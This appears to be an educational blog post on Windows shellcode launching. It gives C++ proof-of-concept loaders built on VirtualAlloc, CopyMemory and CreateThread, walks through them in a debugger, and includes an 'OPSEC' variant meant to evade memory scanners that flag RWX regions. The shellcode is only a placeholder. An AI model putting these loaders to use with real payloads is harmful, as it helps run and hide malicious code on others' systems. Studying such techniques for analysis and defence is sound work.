Windows shellcode launching techniques

This article collects and presents shellcode launching techniques on Windows systems, along with proof-of-concept code and a little debugging to help explain how these techniques work in the background. Wherever possible, I will supplement the analysis with references from real life, that is, incidents or intrusions in which these techniques have been observed.

This post is divided into the following sections:

Technique 1: Allocate Memory via VirtualAlloc
The code
Debugging the code
The OPSEC code
Tools

Technique 1: Allocate Memory via VirtualAlloc

Assuming we have shellcode that implements some desired functionality, we place it in a buffer. This buffer lies in a non-executable region of memory, which means that to execute the shellcode we have to allocate a new memory region with an EXECUTE attribute and copy the shellcode into it. For a list of the available memory protection attributes, see the documentation provided by Microsoft [1]. Once the shellcode is in the new region, we create a thread that executes it. To make sure the shellcode actually runs, we have to wait for the thread to finish before we exit.

The steps described above can be summarized in the following Windows API chain: VirtualAlloc -> CopyMemory -> CreateThread -> WaitForSingleObject

The code

The following code is the vehicle for demonstrating what happens under the hood, in memory. The next section of this article steps through it in a debugger.

BYTE ShellcodeExecute()
{
	// placeholder shellcode: the first byte (0xcc) is an int3 breakpoint
	// replace these bytes with the actual shellcode
	const CHAR shellbuffer[] = { 0xcc, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42 };

	// allocate executable region in memory
	LPVOID allocated = NULL;
	allocated = ::VirtualAlloc(NULL, sizeof(shellbuffer), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (!allocated)
	{
		::wprintf(L"[-] VirtualAlloc has failed: %lu\n", ::GetLastError());
		return 0;
	}

	// copy the shellbuffer into the allocated memory region
	CopyMemory(allocated, shellbuffer, sizeof(shellbuffer));

	// create a thread that executes the code copied into the allocated region
	// (NULL thread attributes request the default security descriptor)
	HANDLE hThread = NULL;
	hThread = ::CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)allocated, NULL, 0, NULL);
	if (!hThread)
	{
		::wprintf(L"[-] CreateThread has failed: %lu\n", ::GetLastError());
		return 0;
	}

	// wait until the created thread finishes, then release its handle
	::WaitForSingleObject(hThread, INFINITE);
	::CloseHandle(hThread);

	return 1;
}

INT main(INT argc, CHAR** argv)
{
	// ShellcodeExecute returns 1 on success and 0 on failure
	BYTE status = ShellcodeExecute();
	if (!status)
	{
		::wprintf(L"[-] ShellcodeExecute has failed: %lu\n", ::GetLastError());
		return 1;
	}

	return 0;
}

Debugging the code

It is recommended to compile the code listed above with debug information. This makes it easier to locate the main function; without debug information, locating it becomes challenging. After compiling the code, we use x64dbg to step through it and see what really happens in memory.

As soon as we open the executable image in x64dbg, we land at the entry point. The entry point for this console application is the mainCRTStartup function:

From this point onwards, we could step through the code (F7 key in x64dbg) until we reach the point where our buffer is initialized in memory. Since we have enabled debug information, however, we can simply press Ctrl+G and type main. This brings us to the main function:

Our goal is to reach the code of the ShellcodeExecute function. Comparing with the code listed above, we observe that although the source of the main function makes only a single function call, the assembly contains one more. Since the function that executes the shellcode does not accept any arguments (void), we step into the second call and land on a jump to ShellcodeExecute:

We step into it and eventually land within the code of ShellcodeExecute. We see the instructions that put the bytes onto the stack (this is how the compiler translates the const CHAR shellbuffer[] = {…} initializer into assembly) and, later, a call to VirtualAlloc:

One question I asked myself is in which section of the PE file these instructions exist. More specifically, where does the compiler put instructions like mov byte ptr ss:[rbp+8],CC in the file?

We can find the answer by right-clicking the address of the instruction in the left-hand column (00007FF64576177B) and selecting Follow in Memory Map, as the picture suggests:

We see that these instructions exist in the .text section of the executable:

The next question is where in memory these bytes (the bytes from the buffer) are written. To answer it, we right-click one of the instructions and choose Follow in Dump, then Address: [RBP + <offset>]. As an example, we follow [RBP+8] to see where the first byte of the buffer is written:

And the result shows:

And the challenge goes on with one more question: where does VirtualAlloc actually allocate memory? To answer this, we put a breakpoint just after the call to VirtualAlloc and inspect the address held in RAX. Remember that RAX is where a function's return value is stored. VirtualAlloc returns the address of the allocated memory, so RAX will contain that address. Let’s follow this memory in the dump:
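When reading that dump, it helps to know that VirtualAlloc works in whole pages: when it picks the address itself, the requested size is rounded up to the next page boundary, so the 16-byte request ends up backed by a full page. Below is a minimal sketch of that arithmetic. The 4096-byte page size is an assumption (typical on x64 Windows; the real value is reported by GetSystemInfo), and the names kAssumedPageSize and RoundUpToPage are hypothetical helpers introduced only for illustration.

```cpp
#include <cstddef>

// Assumption: 4 KiB pages, the usual value on x64 Windows.
// On a real system, query the page size with GetSystemInfo instead.
constexpr std::size_t kAssumedPageSize = 4096;

// Hypothetical helper: round a requested allocation size up to a whole
// number of pages, mirroring how a page-granular allocator sizes a region.
constexpr std::size_t RoundUpToPage(std::size_t size,
                                    std::size_t pageSize = kAssumedPageSize)
{
    return ((size + pageSize - 1) / pageSize) * pageSize;
}
```

Under this assumption, RoundUpToPage(sizeof(shellbuffer)) for the 16-byte buffer evaluates to one full page, which is why the dump shows far more zeroed memory than the buffer needs.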

When is this memory going to be filled with bytes? This happens once CopyMemory finishes. We can either trace the execution flow until we find where the copy happens, or set a hardware breakpoint that triggers when something is written into the buffer. Doing the latter and letting the execution continue, we hit the breakpoint and see that the memory is now filled with bytes:

The first byte in the buffer is intentionally \xcc, which is the int3 breakpoint instruction. If we continue with the execution, the flow now moves into the buffer where we placed the shellcode, and the instruction pointer (RIP) points to the first instruction, in this case the breakpoint:

The OPSEC code

In order to raise fewer flags (especially from memory scanners that look for memory with RWX permissions), we split the memory setup into two steps: first allocate READ/WRITE memory and write the shellcode to it, then change the permissions to EXECUTE/READ to execute the shellcode.
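To make the scanner heuristic concrete, here is a minimal sketch of the kind of check that could be applied to a region's protection value. The numeric values are those of the documented memory protection constants [1], redefined locally with a k prefix so the snippet builds without windows.h. The helper names IsWritable, IsExecutable and IsWriteAndExecute are hypothetical and do not come from any real scanner.

```cpp
#include <cstdint>

// Values of the documented Windows memory protection constants [1],
// redefined locally so this sketch compiles without <windows.h>.
constexpr std::uint32_t kPageReadWrite        = 0x04; // PAGE_READWRITE
constexpr std::uint32_t kPageWriteCopy        = 0x08; // PAGE_WRITECOPY
constexpr std::uint32_t kPageExecute          = 0x10; // PAGE_EXECUTE
constexpr std::uint32_t kPageExecuteRead      = 0x20; // PAGE_EXECUTE_READ
constexpr std::uint32_t kPageExecuteReadWrite = 0x40; // PAGE_EXECUTE_READWRITE
constexpr std::uint32_t kPageExecuteWriteCopy = 0x80; // PAGE_EXECUTE_WRITECOPY

// The low byte carries exactly one base protection value; modifiers such
// as PAGE_GUARD (0x100) sit in higher bits and are masked off here.
constexpr std::uint32_t BaseProtection(std::uint32_t protect)
{
    return protect & 0xFF;
}

// Hypothetical helper: true if the region can be written to.
constexpr bool IsWritable(std::uint32_t protect)
{
    return BaseProtection(protect) == kPageReadWrite ||
           BaseProtection(protect) == kPageWriteCopy ||
           BaseProtection(protect) == kPageExecuteReadWrite ||
           BaseProtection(protect) == kPageExecuteWriteCopy;
}

// Hypothetical helper: true if code in the region can be executed.
constexpr bool IsExecutable(std::uint32_t protect)
{
    return BaseProtection(protect) == kPageExecute ||
           BaseProtection(protect) == kPageExecuteRead ||
           BaseProtection(protect) == kPageExecuteReadWrite ||
           BaseProtection(protect) == kPageExecuteWriteCopy;
}

// The condition an RWX-focused scanner would care about.
constexpr bool IsWriteAndExecute(std::uint32_t protect)
{
    return IsWritable(protect) && IsExecutable(protect);
}
```

With these helpers, the single-step allocation from Technique 1 (PAGE_EXECUTE_READWRITE) satisfies IsWriteAndExecute, while neither state of the two-step approach does: PAGE_READWRITE is writable but not executable, and PAGE_EXECUTE_READ is executable but not writable.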

BYTE ShellcodeExecute()
{
	// placeholder shellcode: the first byte (0xcc) is an int3 breakpoint
	// replace these bytes with the actual shellcode
	const CHAR shellbuffer[] = { 0xcc, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42 };

	// allocate a read/write (not yet executable) region in memory
	LPVOID allocated = NULL;
	allocated = ::VirtualAlloc(NULL, sizeof(shellbuffer), MEM_COMMIT, PAGE_READWRITE);
	if (!allocated)
	{
		::wprintf(L"[-] VirtualAlloc has failed: %lu\n", ::GetLastError());
		return 0;
	}

	// copy the shellbuffer into the allocated memory region
	CopyMemory(allocated, shellbuffer, sizeof(shellbuffer));

	// switch the region from read/write to execute/read before running it
	DWORD OldProtect = 0;
	BOOL VirtualProtectStatus = ::VirtualProtect(allocated, sizeof(shellbuffer), PAGE_EXECUTE_READ, &OldProtect);
	if (!VirtualProtectStatus)
	{
		::wprintf(L"[-] VirtualProtect has failed: %lu\n", ::GetLastError());
		return 0;
	}

	// create a thread that executes the code copied into the allocated region
	// (NULL thread attributes request the default security descriptor)
	HANDLE hThread = NULL;
	hThread = ::CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)allocated, NULL, 0, NULL);
	if (!hThread)
	{
		::wprintf(L"[-] CreateThread has failed: %lu\n", ::GetLastError());
		return 0;
	}

	// wait until the created thread finishes, then release its handle
	::WaitForSingleObject(hThread, INFINITE);
	::CloseHandle(hThread);

	return 1;
}

Tools

The following tools were used for this article:

Visual Studio
x64dbg

[1] https://docs.microsoft.com/en-us/windows/win32/memory/memory-protection-constants

tags:#Windows API